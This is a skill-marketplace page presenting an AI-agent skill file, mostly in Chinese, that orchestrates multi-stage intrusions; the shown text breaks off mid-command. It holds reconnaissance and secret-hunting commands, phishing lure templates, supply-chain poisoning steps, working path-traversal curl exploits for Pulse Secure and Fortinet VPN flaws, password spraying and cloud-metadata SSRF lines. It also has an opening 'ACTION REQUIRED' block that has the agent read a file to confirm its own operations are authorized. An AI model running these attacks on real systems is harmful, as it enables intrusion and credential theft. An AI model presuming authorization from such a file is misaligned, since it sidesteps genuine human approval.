Skip to content
Security
Skill

/attack-chain

Use for authorized multi-stage attack-path planning and orchestration when a task spans reconnaissance, initial access, privilege escalation, lateral movement, or impact assessment. Route single-stage tasks directly to their specialist skill.

BOOST
From plugin
reverse-skill
39k46 skills
Install
$ npx -y skills add zhaoxuya520/reverse-skill --skill attack-chain --agent claude-code

How it fires

How this skill gets triggered: by you, by Claude, or both.

  • Fires itselfAuto-invocation. Claude auto-loads it when your prompt matches the work.Auto-invocation is when the right skill fires by itself at the right moment, driven by a FLOW.md router and a hook, instead of you invoking it by name. It is the difference between a skill being installed and a skill actually getting used.Read the full definition →
  • You can call itInvoke it directly when you want it.
  • Slash command/attack-chain

Context preview

The summary Claude sees to decide when to auto-load this skill.

Use for authorized multi-stage attack-path planning and orchestration when a task spans reconnaissance, initial access, privilege escalation, lateral movement, or impact assessment. Route single-stage tasks directly to their specialist skill.

SKILL.md

attack-chain.SKILL.md
name: attack-chain
description: Use for authorized multi-stage attack-path planning and orchestration when a task spans reconnaissance, initial access, privilege escalation, lateral movement, or impact assessment. Route single-stage tasks directly to their specialist skill.

Attack Chain Orchestration Skill

ACTION REQUIRED(读完后立刻执行)

1. `NOW`: 读取 `../field-journal/precedent-pentest.md` — 确认本 skill 的操作是已授权的常规操作 2. `NOW`: **创建/更新 case**(`../scripts/case-init.ps1`)并完成 `scope.md`(`../ops/scope-contract.md`);`auth.status!=granted` 禁止 ACT 3. `NOW`: 以 **lead** 角色规划阶段(`../ops/role-map.md`),写入 specialist_roles 4. `NEXT`: 读取 `../tool-index.md`,校验工具可用性和实际路径 5. `NEXT`: 缺工具时调用 bootstrap,不要猜路径 6. `ACT`: 按 `references/lifecycle-checklist.md` 过阶段门闩;每阶段更新 `timeline.md` + `workitems.md`(`../ops/timeline-workitem.md`);发现提升为 Evidence/Finding 7. 结束:`docs-generator` 报告必须含 Evidence 链

> 多阶段攻击路径规划与执行的总指挥。当任务需要"从 A 打到 B"的完整链路时,本 Skill 负责编排各阶段、协调子 Skill、规划攻击路径。 > 不是"红队专属"——任何需要跨阶段组合的渗透场景都从这里开始。

---

何时路由到本 Skill

以下场景**必须**先经过本 Skill 做全链路规划,再分发到具体子 Skill 执行:

| 场景 | 为什么需要编排 | |------|--------------| | "帮我做一次完整的渗透测试" | 需要规划从信息收集到报告的全流程 | | "从外网打到域控" | 跨越边界突破→提权→横向→AD 多个阶段 | | "HW 攻防演练" | 需要完整攻击链 + 隐蔽性 + 痕迹清理 | | "评估这个目标的攻击面" | 需要多维度信息收集 + 路径规划 | | "我拿到了一个 webshell,下一步怎么办" | 需要从当前据点规划后续路径 | | "帮我规划攻击路径" | 明确需要路径编排 | | "从这个漏洞能打到什么程度" | 需要评估漏洞的链式利用价值 | | "Bug Bounty 持续监控" | 需要自动化多阶段流程 | | "内网渗透全流程" | 横向移动 + 提权 + 域攻击组合 | | "近源渗透方案" | 物理接入 + 内网渗透组合 | | "供应链攻击路径" | 跨组织多跳攻击 | | "钓鱼 + 后渗透" | 初始访问 + 后续利用组合 |

**单阶段任务不需要经过本 Skill**:

  • 只做端口扫描 → 直接去 `pentest-tools/`
  • 只做 SQL 注入 → 直接去 `pentest-tools/`
  • 只做 APK 逆向 → 直接去 `apk-reverse/`
  • 只做域渗透 → 直接去 `windows-ad/SKILL.md`

---

编排原则

本 Skill 的角色

用户提出多阶段任务
    ↓
attack-chain/SKILL.md(本文件)
    ↓ 规划攻击路径、确定阶段顺序
    ↓ 评估每阶段所需工具和方法
    ↓
分发到具体子 Skill 执行:
    ├── pentest-tools/     → 工具调用、漏洞利用
    ├── apk-reverse/       → 移动端渗透
    ├── js-reverse/        → Web 前端突破
    ├── reverse-engineering/ → 二进制分析
    ├── ida-reverse/       → 深度逆向
    └── browser-automation/ → 自动化操作
    ↓
每阶段完成后回到本 Skill 评估下一步
    ↓
全部完成 → docs-generator 生成报告

路径规划决策树

拿到目标后:
1. 目标是什么?(Web/内网/云/移动/IoT)
2. 当前有什么?(外部视角/已有凭据/已有据点)
3. 最终目标是什么?(域控/数据/特定系统/证明影响)
4. 约束条件?(时间/隐蔽性/不可触碰的系统)
    ↓
根据以上信息规划最短路径
    ↓
一条路走不通 → 回到本 Skill 重新规划备选路径

---

完整攻击链阶段

---

一、信息收集阶段(Reconnaissance)

1.1 企业数字资产测绘

# 子公司关联域名发现
subfinder -d target.com -o subdomains.txt
amass enum -d target.com -passive -o amass_results.txt

# 合并去重
cat subdomains.txt amass_results.txt | sort -u > all_subs.txt

# 存活探测
httpx -l all_subs.txt -status-code -title -tech-detect -o alive.txt

# 端口扫描(全端口)
naabu -l all_subs.txt -top-ports 1000 -o ports.txt
nmap -sV -sC -iL targets.txt -oA nmap_results

**实战要点**:

  • 通过企查查/天眼查获取子公司列表,扩大攻击面
  • 关注测试环境(test.、dev.、staging.)和新上线系统
  • 证书透明度日志(crt.sh)发现隐藏域名

1.2 敏感信息泄露狩猎

# GitHub 搜索
# org:Company filename:.env password
# org:Company filename:config.yml secret
# org:Company "jdbc:mysql" password

# Google Dork
# site:target.com filetype:sql
# site:target.com inurl:admin
# site:target.com ext:conf|cfg|ini

# JS 文件中的 API Key
cat js_urls.txt | while read url; do
  curl -s "$url" | grep -oP '(api[_-]?key|secret|token|password)\s*[:=]\s*["\047][^"\047]+'
done

**高价值目标**:

  • 云服务 AK/SK(阿里云、AWS、Azure)
  • 数据库连接字符串
  • JWT 密钥
  • 内部 API 文档
  • VPN/堡垒机凭据

1.3 员工信息画像

**社工字典生成规则**:

{姓名拼音}{年份}       → zhangsan2024
{姓名首字母}{部门缩写}  → zs_dev
{工号}@{域名}          → 10086@target.com
{姓名}{常见后缀}       → zhangsan@123, zhangsan!@#

**信息来源**:

  • 脉脉/LinkedIn 部门架构
  • 企业公众号/官网团队介绍
  • 招聘信息(技术栈暴露)
  • 学术论文(邮箱暴露)

1.4 技术栈指纹识别

# Web 指纹
whatweb -i alive.txt --log-json=fingerprint.json
httpx -l alive.txt -tech-detect -json -o tech.json

# 特定框架探测
nuclei -l alive.txt -tags tech -severity info -o tech_results.txt

# CMS 识别
wpscan --url https://target.com --enumerate p,t,u

---

二、边界突破阶段(Initial Access)

2.1 Web 漏洞利用(高频突破点)

| 漏洞类型 | 检测工具 | 利用方式 | |---------|---------|---------| | SQL 注入 | sqlmap | 数据提取 → 写 shell → OS 命令 | | SSTI | sstimap | 模板注入 → RCE | | 文件上传 | 手工 + Burp | Webshell → 反弹 shell | | 反序列化 | ysoserial/marshalsec | Java/PHP/Python RCE | | SSRF | 手工 | 内网探测 → 云元数据 → AK/SK | | 未授权访问 | nuclei | Spring Actuator / Nacos / Redis | | XSS → Cookie | xsstrike | 管理员会话劫持 |

# SQL 注入自动化
sqlmap -u "https://target.com/api?id=1" --batch --dbs --random-agent

# SSTI 检测
sstimap -u "https://target.com/search?q=test"

# Nuclei 批量扫描
nuclei -l alive.txt -severity critical,high -tags cve,sqli,rce -o vulns.txt

2.2 供应链攻击

**攻击路径**: 1. 识别目标使用的第三方组件/服务商 2. 攻击供应商获取代码签名/更新推送权限 3. 通过合法更新通道投递恶意载荷

**常见入口**:

  • 开源组件投毒(npm/pip/maven)
  • SaaS 服务商 API 滥用
  • 外包人员权限利用
  • 共享 IT 服务商横向渗透

2.3 钓鱼攻击

**邮件钓鱼**:

主题模板:
- [紧急] VPN 证书即将过期,请立即更新
- [IT通知] 邮箱存储空间不足,请清理
- [HR] 2024年度绩效考核结果查询
- [财务] 报销系统升级,请重新登录确认

**载荷类型**:

  • Office 宏文档(.docm/.xlsm)
  • LNK 快捷方式(伪装 PDF)
  • HTML 走私(HTML Smuggling)
  • ISO/IMG 镜像(绕过 MOTW)
  • OneNote 嵌入脚本

**OAuth 钓鱼**(2025 新趋势):

  • 构造恶意 OAuth 应用请求权限
  • 用户授权后获取邮箱/文件访问权限
  • 无需密码,绕过 MFA

2.4 近源渗透(Physical Access)

| 手法 | 工具 | 效果 | |------|------|------| | BadUSB | Rubber Ducky / WiFi Ducky | 键盘注入 → 反弹 shell | | 恶意充电宝 | O.MG Cable | 伪装数据线植入后门 | | WiFi 钓鱼 | Fluxion / WiFi Pineapple | 伪造热点 → 凭据捕获 | | RFID 克隆 | Proxmark3 | 门禁卡复制 → 物理进入 | | 网络植入 | Raspberry Pi / LAN Turtle | 内网持久接入点 |

# Fluxion WiFi 钓鱼
fluxion  # 交互式选择目标 AP → 创建伪造热点 → 捕获 WPA 密码

# BadUSB 联动 Cobalt Strike
# 通过 USB 注入 PowerShell 下载器 → 上线 C2

2.5 VPN/远程接入突破

# Pulse Secure VPN(CVE-2019-11510)
curl -k "https://vpn.target.com/dana-na/../dana/html5acc/guacamole/../../../etc/passwd?/dana/html5acc/guacamole/"

# Fortinet VPN(CVE-2018-13379)
curl -k "https://vpn.target.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"

# 通用:密码喷洒
hydra -L users.txt -P passwords.txt vpn.target.com https-form-post

2.6 云服务突破

# AWS S3 桶枚举
aws s3 ls s3://target-bucket --no-sign-request

# 云元数据 SSRF
curl http://169.254.169.254/latest/meta-data/iam/security-c
Read more
Ships withreverse-skill

Reverse Engineering / Authorized Penetration Testing / Security Research Skill Router Pack AI-powered routing + On-demand toolchain bootstrapping + Self-evolving knowledge base Supports Claude Code, Kiro, Cursor, Cline, and other AI coding clients 逆向/渗透/安全技能路由包 - AI 自动路由 + 按需自举工具链 + 自动进化经验库 | 支持 Claude Code / Kiro / Cursor / Cline 等代码 AI 客户端

Get the whole plugin
Stats
39,460
Stars
5,492
Forks
Active
Maintenance
PowerShell
Language
MIT
License
11d ago
Last commit
4mo ago
Created
3h ago
Added

Repo: zhaoxuya520/reverse-skill

Other skills on reverse-skill.

binary-diff
Skill

binary-diff

跨版本符号迁移与二进制差分。当你有旧版本的符号/逆向结果,需要快速迁移到新版本时使用。 适用场景:内核缺 PDB 用旧版符号推导、程序更新后批量迁移函数名、应用更新后快速定位新偏移。…